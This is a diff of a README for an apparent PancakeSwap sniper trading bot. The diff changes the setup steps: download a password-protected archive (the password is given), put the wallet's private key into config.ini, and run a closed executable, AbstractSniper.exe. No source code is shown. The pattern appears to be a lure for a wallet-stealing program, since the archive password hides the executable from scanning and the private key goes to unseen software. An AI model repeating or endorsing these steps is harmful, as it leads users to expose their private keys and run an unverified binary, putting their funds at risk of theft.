EvaDreamless/Pancakeswap-Sniper-Bot/README.md

 # How to use:
 _____________

-Download zip archive and extract bot to a preferred folder

-You need to open config.ini
+1. Download
+2. Unpack archive, password - AbstractHQ
+3. Edit the config.ini

 WALLETADDRESS: Your public address.
 PRIVATEKEY: 0x…
 LIQUIDITYPOOL: BNB, You can choose any pool.
 TRADEMODE: true, True if you want to activate, it otherwise false

+4. Open AbstractSniper.exe

 How to run